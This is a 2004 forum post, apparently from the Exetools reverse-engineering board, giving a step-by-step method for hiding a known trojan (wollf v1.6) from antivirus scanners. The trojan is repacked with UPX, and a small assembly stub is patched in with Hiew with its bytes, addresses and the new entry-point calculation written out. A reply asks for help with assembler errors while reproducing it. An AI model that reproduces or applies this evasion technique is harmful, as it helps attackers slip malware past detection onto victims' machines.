Exetools - View Single Post

#1 03-24-2004, 11:23

++++++++++++++++++++++++++++++++++++++++
Universal method of tricking antivirus.
By Progressor

Tools:
Hex redactor - I used Hiew 6.75 (http://webhost.kemtel.ru/~sen)
Fearless PE Tool 0.1 - http://areyoufearless.com/modules.php?op=m...q=getit&lid=125
UPX packer - http://upx.sourceforge.net/
Brain - must have it, you can't download it.

I took for example well known trojan wollf v1.6 (www.xfocus.org)

Now, let start:

Wollf is already packed by an old version of UPX, so we unpack and pack it again by newest version

of UPX.
Now we are using PE tool and we will find this info about our trojan:

Entry Point: 00024FD0h
Image Base: 00400000h

Let us open wollf.exe in Hiew, go to disassemble mode (F4/Decode), go to address Entry Point + Image Base = 00424FD0h, for doing this press Goto (F5) and type ".00424FD0" (you need this dot before address, because it is a virtual address). Now we see something like this:

CODE

.00424FD0: 60 pushad
.00424FD1: BE00804100 mov esi,000418000 -----^ (1)
.00424FD6: 8DBE0090FEFF lea edi,[esi][0FFFE9000]
.00424FDC: 57 push edi
.00424FDD: 83CDFF or ebp,-001;"O"
.00424FE0: EB10 jmps .000424FF2 -----v (2)

Now we have to find place for our patch, scroll down a couple of pages and you'll see a lot of place with zeros. I choose address 00425147. For edit press F3/F2.
OEP = Entry Point + Image Base

CODE

.00425147: 68D04F4200 push 000424FD0 <--- push OEP
.0042514C: 50 push eax
.0042514D: 9C pushfd <---for tricking AVP
.0042514E: 60 pushad <---for tricking AVP
.0042514F: E800000000 call .000425154 <----- call for Ret 28h

add another command: Ret 28h you will see

CODE

.00425154: C22800 retn 00028;" ("

for Save press F9

and we add another 2 commands
INC ECX
LOOP patch address

CODE

.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147

Finally we have our patch:

CODE

.0042513F: 0000 add [eax],al
.00425141: 0000 add [eax],al
.00425143: 0000 add [eax],al
.00425145: 0000 add [eax],al
.00425147: 68D04F4200 push 000424FD0 -----^ (1)
.0042514C: 50 push eax
.0042514D: 9C pushfd
.0042514E: 60 pushad
.0042514F: E800000000 call .000425154 -----v (2)
.00425154: C22800 retn 00028;" ("
.00425157: 0000 add [eax],al
.00425159: 0000 add [eax],al
.0042515B: 0000 add [eax],al
.0042515D: 0000 add [eax],al
.0042515F: 0000 add [eax],al
.00425161: 41 inc ecx <------- our new Entry Point
.00425162: E2E3 loop .000425147 -----^ (3)
.00425164: 0000 add [eax],al
.00425166: 0000 add [eax],al
.00425168: 0000 add [eax],al

And last thing we should do, we open the file in PE tool and change Entry Point:
Entry Point = Offset - Image Base = 00425161 - 00400000 = 0025161h

Now, if you can unpack the file with UPX, then I suppose you did it right. (don't forget to backup

your file or you'll have to make this patch again.)
Enjoy.
+++++++++++++++++++++++++++++++++++++++++++++++

I don't know any assembly but always eager to learn

I encounter a problem while trying to reproduce the above:

call .000425154
loop .000425147

In both cases hiew gives me an error "Invalid Operand". I CAN add the addresses without a "dot" but I guess that wont work.

Any idea what I'm doing wrong?

Thanks in advance